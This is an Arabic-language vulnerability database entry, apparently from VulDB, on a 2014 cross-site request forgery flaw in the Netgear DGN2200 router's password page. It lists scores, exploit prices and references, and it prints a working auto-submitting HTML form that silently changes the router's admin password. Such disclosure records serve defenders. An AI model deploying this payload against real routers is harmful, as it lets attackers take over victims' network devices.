Netgear DGN2200 1.0.0.29_1.7.29_hots Web Admin Interface /password.cgi طلب تزوير مشترك
CVSS درجة الميتا الوقتية | سعر الإكسبلويت الحالي (≈) | درجة اهتمام الـCTI |
---|---|---|
4.2 | $0-$5k | 0.00 |
تم أيجاد ثغرة أمنية بصنف مشكلة صعبة الحل. في Netgear DGN2200 1.0.0.29_1.7.29_hots. المشكلة أثرت على دالة غير معروفة من الملف /password.cgi من العنصر Web Admin Interface. تعريف الـ سي دبليو أي للثغرة الأمنية هو CWE-352. المشكلة تمت مشاركتها بتاريخ 30/04/2014 بواسطة Dolev Farhi.
يمكن شن الهجوم هذا عن بعد. التفاصيل التقنية متوفرة. التقارير تشير بأن الثغرة الأمنية هذه ذات شهرة أقل من المتوسط. هنالك إكسبلويت متوفرة. تم الإبلاغ عن ال إكسبلويت ويمكن استخدامها. سعر الإكسبلويت الحالي تقريباً. USD $0-$5k في هذه اللحظة.
تم أعتبراها على أنها فعالة للغاية. يمكن تحميل الإكسبلويت من هناpastebin.com. لكونها ثغرة هجوم فوري متوسط سعرها كان$5k-$25k. الكود البرمجي المستخدم بواسطة الإكسبلويت هو:
<html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to change Admin password</H2> <form method="POST" name="form0" action="http://www.example.com/password.cgi"> <input type="hidden" name="sysOldPasswd" value="OLDPASS"/> <input type="hidden" name="sysNewPasswd" value="NEWPASS"/> <input type="hidden" name="sysConfirmPasswd" value="NEWPASS"/> <input type="hidden" name="authTImeout" value="5"/> <input type="hidden" name="cfAlert_Apply" value="Apply"/> </form> </body> </html>
الثغرة الأمنية هذه تم تسجيلها في قواعد بيانات آخرى: SecurityFocus (BID 67201) , X-Force (93014).
منتج
النوع
المجهز
الأسم
النسخة
الرخصة
CPE 2.3
CPE 2.2
CVSSv4
VulDB CVSS-B Score: 🔍VulDB CVSS-BT Score: 🔍
VulDB متجه: 🔍
VulDB الاعتمادية: 🔍
CVSSv3
VulDB الدرجة الأساسية للميتا: 4.3VulDB درجة الميتا الوقتية: 4.2
VulDB الدرجة الأساسية: 4.3
VulDB الدرجة الوقتية: 4.2
VulDB متجه: 🔍
VulDB الاعتمادية: 🔍
CVSSv2
AV | AC | Au | C | I | A |
---|---|---|---|---|---|
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
متجه | التعقيد | توثيق | السرية | الأمانة | التوفر |
---|---|---|---|---|---|
افتح | افتح | افتح | افتح | افتح | افتح |
افتح | افتح | افتح | افتح | افتح | افتح |
افتح | افتح | افتح | افتح | افتح | افتح |
VulDB الدرجة الأساسية: 🔍
VulDB الدرجة الوقتية: 🔍
VulDB الاعتمادية: 🔍
إكسبلويت
الفئة: طلب تزوير مشتركCWE: CWE-352 / CWE-862 / CWE-863
CAPEC: 🔍
ATT&CK: 🔍
محلي: لا
عن بعد: نعم
التوفر: 🔍
وصول: عام
الحالة: فعالة للغاية
الكاتب: Dolev Farhi
تحميل: 🔍
تقدير السعر: 🔍
تقدير السعر الحالي: 🔍
0-Day | افتح | افتح | افتح | افتح |
---|---|---|---|---|
اليوم | افتح | افتح | افتح | افتح |
استخبارات التهديد
الاهتمام: 🔍الفاعلين النشيطين: 🔍
مجوعات الـAPT الفعالة: 🔍
إجراءات مضادة
المقترح: لا يوجد تخفيف معروفالحالة: 🔍
زمن الهجوم الفوري: 🔍
مدة تأخر الإكسبلويت: 🔍
التسلسل زمني
30/04/2014 🔍30/04/2014 🔍
03/05/2014 🔍
09/05/2014 🔍
02/04/2019 🔍
المصادر
المجهز: netgear.comباحث: Dolev Farhi
الحالة: غير معرفة
X-Force: 93014 - NETGEAR DGN2200 router cross-site request forgery, Medium Risk
SecurityFocus: 67201 - NETGEAR DGN2200 ADSL Router Cross Site Request Forgery Vulnerability
scip Labs: https://www.scip.ch/en/?labs.20161013
آقرأ ايضاً: 🔍
ادخال
تم الانشاء: 09/05/2014 10:42تم التحديث: 02/04/2019 00:09
التغييرات: 09/05/2014 10:42 (43), 02/04/2019 00:09 (9)
كامل: 🔍
Cache ID: 3:1E7:103
لا توجد تعليقات اللغات: ar + en.
يرجى تسجيل الدخول حتى تتمكن من التعليق